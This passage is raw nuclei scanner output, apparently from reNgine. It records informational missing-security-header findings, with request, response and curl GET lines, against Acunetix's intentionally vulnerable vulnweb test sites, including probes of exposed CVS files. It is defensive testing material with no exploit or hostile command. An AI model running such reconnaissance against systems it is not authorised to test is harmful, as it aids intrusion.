vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.402087758Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.40210299Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:56 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.538712301Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testhtml5.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.701779056Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/contact\",\"path\":\"/contact\",\"matched-at\":\"http://testhtml5.vulnweb.com/contact\",\"request\":\"GET /contact HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.701837266Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 Edg/96.0.1054.53' 'http://testhtml5.vulnweb.com/contact'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"path\":\"/ajax/archive\",\"matched-at\":\"http://testhtml5.vulnweb.com/ajax/archive\",\"request\":\"GET /ajax/archive HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 2\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n[]\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.701840398Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/forgotpw\",\"path\":\"/forgotpw\",\"matched-at\":\"http://testhtml5.vulnweb.com/forgotpw\",\"request\":\"GET /forgotpw HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 405 METHOD NOT ALLOWED\\r\\nConnection: close\\r\\nContent-Length: 178\\r\\nAllow: POST, OPTIONS\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e405 Method Not Allowed\\u003c/title\\u003e\\n\\u003ch1\\u003eMethod Not Allowed\\u003c/h1\\u003e\\n\\u003cp\\u003eThe method is not allowed for the requested URL.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.701853154Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/604.4.15 (KHTML, like Gecko) Version/16.3 Safari/604.4.1' 'http://testhtml5.vulnweb.com/forgotpw'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"path\":\"/CVS/Entries.Log\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"request\":\"GET /CVS/Entries.Log HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.701858Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0 maglev/24046.2809.2757.3796/49' 'http://testphp.vulnweb.com/CVS/Entries.Log'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"path\":\"/static/app/libs/sessvars.js:105at\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at\",\"request\":\"GET /static/app/libs/sessvars.js:105at HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.701857609Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:105at'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n 